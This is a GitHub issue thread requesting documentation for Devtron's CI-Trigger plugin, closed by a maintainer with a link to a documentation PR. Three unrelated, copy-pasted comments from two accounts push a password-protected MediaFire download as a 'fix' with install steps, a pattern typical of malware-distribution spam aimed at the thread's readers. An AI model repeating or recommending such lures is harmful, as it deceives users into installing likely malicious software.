### ISSUE TITLE
Doc: Create a documentation for Devtron-CI-Trigger plugin

### ISSUE THREAD

**Issue by bhushan-nemade-dt** [devtron-labs/devtron#5746]
### 💭 Description

Documentation for the Devtron-CI-Trigger plugin is not present in docs, it needs to be created and added in docs.

### 👀 Have you spent some time to check if this issue has been raised before?

- [X] I checked and didn't find similar issue

### 🏢 Have you read the Code of Conduct?

- [X] I have read the [Code of Conduct](https://github.com/devtron-labs/devtron/blob/main/CODE_OF_CONDUCT.md)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by satyampsoni** [comment]
closing this issue with refrence to this [PR](https://github.com/devtron-labs/devtron-documentation/pull/6)
